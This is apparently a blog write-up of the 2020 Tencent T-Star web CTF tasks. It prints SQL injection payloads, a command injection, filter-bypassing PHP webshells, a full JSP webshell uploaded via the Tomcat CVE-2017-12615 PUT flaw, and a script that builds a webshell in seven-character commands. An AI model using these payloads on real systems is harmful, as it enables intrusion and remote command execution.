2020腾讯犀牛鸟网络安全T-Star高校挑战赛

2020-07-02 93次浏览 0条评论  前往评论

前言


Gq和hhhm师傅tql

签到


考点:前端js验证图片后缀

上传jpg图片后改php后缀forword,内容是一句话木马

在key目录下有key{K735c9f0D7ddc3b9}

成绩单


输入框输入

0' union select 1,2,3,database()--
0' union select 1,2,3,table_name from information_schema.tables where table_schema='web1'#
0' union select 1,2,3,column_name from information_schema.columns where table_name='fl4g'#
0' union select 1,2,3,flag from fl4g#

命令执行基础


baidu.com | cat  ../key.php

你能爆破吗


  • burpsuite爆破密码账号都是admin,登陆成功会set一个cookie,cookie是用户名的base64。

  • payload

-admin"union select 1,(select group_concat(flag) from flag),3-- 
  • base64
LWFkbWluInVuaW9uIHNlbGVjdCAxLChzZWxlY3QgZ3JvdXBfY29uY2F0KGZsYWcpIGZyb20gZmxhZyksMy0tIA==

文件包含GetShell


首先在lfi.txt读到源码

<?php
$file = $_REQUEST['file'];
if ($file != '') {
    $inc = sprintf("%s.php", $file); // only php file can be included
    include($inc);
}
?>

直接用伪协议

file=php://filter/read=convert.base64-encode/resource=flag

文件上传


  • 对<?、php、eval等进行了过滤,过滤比较简单直接替换为空,直接双写就能绕过,eval直接利用php对大小写不敏感绕过。

  • payload

<php?<?p<?phphp EVAL($_POST['cmd']);?>

然后改.pht的后缀能上传,限制了20kb-100kb的文件大小,和图片混在一起上传即可,连上蚁剑之后在key下发现flag{Aa3c7c37508E40B3}

小猫咪踩灯泡


题目给hint

  • CVE-2017-12615

抓包把GET改为PUT,后面添加jsp加斜杠上传马

PUT /kawhi.jsp/ HTTP/1.1
Host: 012c8bc2.yunyansec.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 20 Jun 2019 10:03:08 GMT
If-None-Match: W/"5619-1561024988000"
Cache-Control: max-age=0
Content-Length: 666

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

查看根目录

http://012c8bc2.yunyansec.com/kawhi.jsp?&pwd=023&cmd=ls

发现flag文件

http://012c8bc2.yunyansec.com/kawhi.jsp?&pwd=023&cmd=cat%20flag.txt

分析代码获得flag


题目直接给源码

 <?php
show_source(__FILE__);
error_reporting(0);
if(strlen($_GET[1])<7){
     echo shell_exec($_GET[1]);
}
?>

基础知识

详情参考:传送门传送门

这里的话是限制了7个字符

payload用的是仕廷大佬wp里的

>l\\
>s\ \\
ls>_
>\ \\
>-t\\
>\>y
ls>>_

这里的意思我觉得是先构造_,然后利用_去构造出ls -t>y,然后再利用ls -t>y去构造我们的webshell。

webshell

>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
sh _
sh y

脚本访问

import requests
url = "http://86568f48.yunyansec.com/?1={0}"
print("[+]start attack!!!")
with open("payload.txt","r") as f:
    for i in f:
        print("[*]" + url.format(i.strip()))
        requests.get(url.format(i.strip()))
#检查是否攻击成功
test = requests.get("http://86568f48.yunyansec.com/1.php")
if test.status_code == requests.codes.ok:
    print("[*]Attack success!!!")

然后就可以查看信息了

http://86568f48.yunyansec.com/1.php?1=phpinfo();

连接蚁剑的话要构造一个post

http://86568f48.yunyansec.com/1.php?1=eval($_POST['cmd']);

在上一级的key可以找到flag{a1c8BFF2}



登录后回复

共有0条评论